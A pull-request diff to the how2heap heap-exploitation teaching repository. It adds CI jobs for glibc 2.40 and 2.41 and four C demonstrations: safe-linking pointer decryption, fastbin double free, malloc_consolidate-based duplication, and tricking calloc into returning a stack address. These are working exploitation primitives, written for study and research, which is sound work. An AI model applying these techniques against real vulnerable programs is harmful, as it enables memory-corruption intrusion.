Merge pull request #211 from shellphish/2.41

add 2.40 and 2.41

Author: Kyle-Kyle

.github/workflows/ci.yml

@@ -165,3 +165,29 @@ jobs:
         with:
           ubuntu: '24.04'
           glibc: '2.39'
+  v2_40:
+    runs-on: ubuntu-22.04
+    name: glibc-v2.40
+    steps:
+      - name: build how2heap
+        uses: shellphish/how2heap/ci/build@master
+        with:
+          ubuntu: '24.04'
+      - name: test how2heap
+        uses: shellphish/how2heap/ci/test@master
+        with:
+          ubuntu: '24.10'
+          glibc: '2.40'
+  v2_41:
+    runs-on: ubuntu-22.04
+    name: glibc-v2.41
+    steps:
+      - name: build how2heap
+        uses: shellphish/how2heap/ci/build@master
+        with:
+          ubuntu: '24.04'
+      - name: test how2heap
+        uses: shellphish/how2heap/ci/test@master
+        with:
+          ubuntu: '25.04'
+          glibc: '2.41'

Makefile

@@ -1,6 +1,6 @@
 .PHONY: help clean distclean all test
 
-VERSIONS := 2.23 2.24 2.27 2.31 2.32 2.33 2.34 2.35 2.36 2.37 2.38 2.39
+VERSIONS := 2.23 2.24 2.27 2.31 2.32 2.33 2.34 2.35 2.36 2.37 2.38 2.39 2.40 2.41
 TECH_BINS := $(patsubst %.c,%,$(wildcard glibc_*/*.c))
 BASE_BINS := $(patsubst %.c,%,$(wildcard *.c))
 DOWNLOADED := glibc-all-in-one/libs glibc-all-in-one/debs

glibc_2.40/decrypt_safe_linking.c

@@ -0,0 +1,66 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <assert.h>
+
+long decrypt(long cipher)
+{
+	puts("The decryption uses the fact that the first 12bit of the plaintext (the fwd pointer) is known,");
+	puts("because of the 12bit sliding.");
+	puts("And the key, the ASLR value, is the same with the leading bits of the plaintext (the fwd pointer)");
+	long key = 0;
+	long plain;
+
+	for(int i=1; i<6; i++) {
+		int bits = 64-12*i;
+		if(bits < 0) bits = 0;
+		plain = ((cipher ^ key) >> bits) << bits;
+		key = plain >> 12;
+		printf("round %d:\n", i);
+		printf("key:    %#016lx\n", key);
+		printf("plain:  %#016lx\n", plain);
+		printf("cipher: %#016lx\n\n", cipher);
+	}
+	return plain;
+}
+
+int main()
+{
+	/*
+	 * This technique demonstrates how to recover the original content from a poisoned
+	 * value because of the safe-linking mechanism.
+	 * The attack uses the fact that the first 12 bit of the plaintext (pointer) is known
+	 * and the key (ASLR slide) is the same to the pointer's leading bits.
+	 * As a result, as long as the chunk where the pointer is stored is at the same page
+	 * of the pointer itself, the value of the pointer can be fully recovered.
+	 * Otherwise, we can also recover the pointer with the page-offset between the storer
+	 * and the pointer. What we demonstrate here is a special case whose page-offset is 0. 
+	 * For demonstrations of other more general cases, plz refer to 
+	 * https://github.com/n132/Dec-Safe-Linking
+	 */
+
+	setbuf(stdin, NULL);
+	setbuf(stdout, NULL);
+
+	// step 1: allocate chunks
+	long *a = malloc(0x20);
+	long *b = malloc(0x20);
+	printf("First, we create chunk a @ %p and chunk b @ %p\n", a, b);
+	malloc(0x10);
+	puts("And then create a padding chunk to prevent consolidation.");
+
+
+	// step 2: free chunks
+	puts("Now free chunk a and then free chunk b.");
+	free(a);
+	free(b);
+	printf("Now the freelist is: [%p -> %p]\n", b, a);
+	printf("Due to safe-linking, the value actually stored at b[0] is: %#lx\n", b[0]);
+
+	// step 3: recover the values
+	puts("Now decrypt the poisoned value");
+	long plaintext = decrypt(b[0]);
+
+	printf("value: %p\n", a);
+	printf("recovered value: %#lx\n", plaintext);
+	assert(plaintext == (long)a);
+}

glibc_2.40/fastbin_dup.c

@@ -0,0 +1,50 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <assert.h>
+
+int main()
+{
+	setbuf(stdout, NULL);
+
+	printf("This file demonstrates a simple double-free attack with fastbins.\n");
+
+	printf("Fill up tcache first.\n");
+	void *ptrs[8];
+	for (int i=0; i<8; i++) {
+		ptrs[i] = malloc(8);
+	}
+	for (int i=0; i<7; i++) {
+		free(ptrs[i]);
+	}
+
+	printf("Allocating 3 buffers.\n");
+	int *a = calloc(1, 8);
+	int *b = calloc(1, 8);
+	int *c = calloc(1, 8);
+
+	printf("1st calloc(1, 8): %p\n", a);
+	printf("2nd calloc(1, 8): %p\n", b);
+	printf("3rd calloc(1, 8): %p\n", c);
+
+	printf("Freeing the first one...\n");
+	free(a);
+
+	printf("If we free %p again, things will crash because %p is at the top of the free list.\n", a, a);
+	// free(a);
+
+	printf("So, instead, we'll free %p.\n", b);
+	free(b);
+
+	printf("Now, we can free %p again, since it's not the head of the free list.\n", a);
+	free(a);
+
+	printf("Now the free list has [ %p, %p, %p ]. If we malloc 3 times, we'll get %p twice!\n", a, b, a, a);
+	a = calloc(1, 8);
+	b = calloc(1, 8);
+	c = calloc(1, 8);
+	printf("1st calloc(1, 8): %p\n", a);
+	printf("2nd calloc(1, 8): %p\n", b);
+	printf("3rd calloc(1, 8): %p\n", c);
+
+	assert(a == c);
+}

glibc_2.40/fastbin_dup_consolidate.c

@@ -0,0 +1,85 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <assert.h>
+
+/*
+Original reference: https://valsamaras.medium.com/the-toddlers-introduction-to-heap-exploitation-fastbin-dup-consolidate-part-4-2-ce6d68136aa8
+
+This document is mostly used to demonstrate malloc_consolidate and how it can be leveraged with a
+double free to gain two pointers to the same large-sized chunk, which is usually difficult to do 
+directly due to the previnuse check. Interestingly this also includes tcache-sized chunks of certain sizes.
+
+malloc_consolidate(https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L4714) essentially
+merges all fastbin chunks with their neighbors, puts them in the unsorted bin and merges them with top
+if possible.
+
+As of glibc version 2.35 it is called only in the following five places:
+1. _int_malloc: A large sized chunk is being allocated (https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L3965)
+2. _int_malloc: No bins were found for a chunk and top is too small (https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L4394)
+3. _int_free: If the chunk size is >= FASTBIN_CONSOLIDATION_THRESHOLD (65536) (https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L4674)
+4. mtrim: Always (https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L5041)
+5. __libc_mallopt: Always (https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L5463)
+
+We will be targeting the first place, so we will need to allocate a chunk that does not belong in the 
+small bin (since we are trying to get into the 'else' branch of this check: https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/malloc.c#L3901). 
+This means our chunk will need to be of size >= 0x400 (it is thus large-sized). Notably, the 
+biggest tcache sized chunk is 0x410, so if our chunk is in the [0x400, 0x410] range we can utilize 
+a double free to gain control of a tcache sized chunk.   
+*/
+
+#define CHUNK_SIZE 0x400
+
+int main() {
+	printf("This technique will make use of malloc_consolidate and a double free to gain a duplication in the tcache.\n");
+	printf("Lets prepare to fill up the tcache in order to force fastbin usage...\n\n");
+
+	void *ptr[7];
+
+	for(int i = 0; i < 7; i++)
+		ptr[i] = malloc(0x40);
+
+	void* p1 = malloc(0x40);
+	printf("Allocate another chunk of the same size p1=%p \n", p1);
+
+	printf("Fill up the tcache...\n");
+	for(int i = 0; i < 7; i++)
+		free(ptr[i]);
+
+  	printf("Now freeing p1 will add it to the fastbin.\n\n");
+  	free(p1);
+
+	printf("To trigger malloc_consolidate we need to allocate a chunk with large chunk size (>= 0x400)\n");
+	printf("which corresponds to request size >= 0x3f0. We will request 0x400 bytes, which will gives us\n");
+	printf("a tcache-sized chunk with chunk size 0x410 ");
+  	void* p2 = malloc(CHUNK_SIZE);
+
+	printf("p2=%p.\n", p2);
+
+	printf("\nFirst, malloc_consolidate will merge the fast chunk p1 with top.\n");
+	printf("Then, p2 is allocated from top since there is no free chunk bigger (or equal) than it. Thus, p1 = p2.\n");
+
+	assert(p1 == p2);
+
+  	printf("We will double free p1, which now points to the 0x410 chunk we just allocated (p2).\n\n");
+	free(p1); // vulnerability (double free)
+	printf("It is now in the tcache (or merged with top if we had initially chosen a chunk size > 0x410).\n");
+
+	printf("So p1 is double freed, and p2 hasn't been freed although it now points to a free chunk.\n");
+
+	printf("We will request 0x400 bytes. This will give us the 0x410 chunk that's currently in\n");
+	printf("the tcache bin. p2 and p1 will still be pointing to it.\n");
+	void *p3 = malloc(CHUNK_SIZE);
+
+	assert(p3 == p2);
+
+	printf("We now have two pointers (p2 and p3) that haven't been directly freed\n");
+	printf("and both point to the same tcache sized chunk. p2=%p p3=%p\n", p2, p3);
+	printf("We have achieved duplication!\n\n");
+
+	printf("Note: This duplication would have also worked with a larger chunk size, the chunks would\n");
+	printf("have behaved the same, just being taken from the top instead of from the tcache bin.\n");
+	printf("This is pretty cool because it is usually difficult to duplicate large sized chunks\n");
+	printf("because they are resistant to direct double free's due to their PREV_INUSE check.\n");
+
+	return 0;
+}

glibc_2.40/fastbin_dup_into_stack.c

@@ -0,0 +1,77 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <assert.h>
+
+int main()
+{
+	fprintf(stderr, "This file extends on fastbin_dup.c by tricking calloc into\n"
+	       "returning a pointer to a controlled location (in this case, the stack).\n");
+
+
+	fprintf(stderr,"Fill up tcache first.\n");
+
+	void *ptrs[7];
+
+	for (int i=0; i<7; i++) {
+		ptrs[i] = malloc(8);
+	}
+	for (int i=0; i<7; i++) {
+		free(ptrs[i]);
+	}
+
+
+	unsigned long stack_var[4] __attribute__ ((aligned (0x10)));
+
+	fprintf(stderr, "The address we want calloc() to return is %p.\n", stack_var + 2);
+
+	fprintf(stderr, "Allocating 3 buffers.\n");
+	int *a = calloc(1,8);
+	int *b = calloc(1,8);
+	int *c = calloc(1,8);
+
+	fprintf(stderr, "1st calloc(1,8): %p\n", a);
+	fprintf(stderr, "2nd calloc(1,8): %p\n", b);
+	fprintf(stderr, "3rd calloc(1,8): %p\n", c);
+
+	fprintf(stderr, "Freeing the first one...\n"); //First call to free will add a reference to the fastbin
+	free(a);
+
+	fprintf(stderr, "If we free %p again, things will crash because %p is at the top of the free list.\n", a, a);
+
+	fprintf(stderr, "So, instead, we'll free %p.\n", b);
+	free(b);
+
+	//Calling free(a) twice renders the program vulnerable to Double Free
+
+	fprintf(stderr, "Now, we can free %p again, since it's not the head of the free list.\n", a);
+	free(a);
+
+	fprintf(stderr, "Now the free list has [ %p, %p, %p ]. "
+		"We'll now carry out our attack by modifying data at %p.\n", a, b, a, a);
+	unsigned long *d = calloc(1,8);
+
+	fprintf(stderr, "1st calloc(1,8): %p\n", d);
+	fprintf(stderr, "2nd calloc(1,8): %p\n", calloc(1,8));
+	fprintf(stderr, "Now the free list has [ %p ].\n", a);
+	fprintf(stderr, "Now, we have access to %p while it remains at the head of the free list.\n"
+		"so now we are writing a fake free size (in this case, 0x20) to the stack,\n"
+		"so that calloc will think there is a free chunk there and agree to\n"
+		"return a pointer to it.\n", a);
+	stack_var[1] = 0x20;
+
+	fprintf(stderr, "Now, we overwrite the first 8 bytes of the data at %p to point right before the 0x20.\n", a);
+	fprintf(stderr, "Notice that the stored value is not a pointer but a poisoned value because of the safe linking mechanism.\n");
+	fprintf(stderr, "^ Reference: https://research.checkpoint.com/2020/safe-linking-eliminating-a-20-year-old-malloc-exploit-primitive/\n");
+	unsigned long ptr = (unsigned long)stack_var;
+	unsigned long addr = (unsigned long) d;
+	/*VULNERABILITY*/
+	*d = (addr >> 12) ^ ptr;
+	/*VULNERABILITY*/
+
+	fprintf(stderr, "3rd calloc(1,8): %p, putting the stack address on the free list\n", calloc(1,8));
+
+	void *p = calloc(1,8);
+
+	fprintf(stderr, "4th calloc(1,8): %p\n", p);
+	assert((unsigned long)p == (unsigned long)stack_var + 0x10);
+}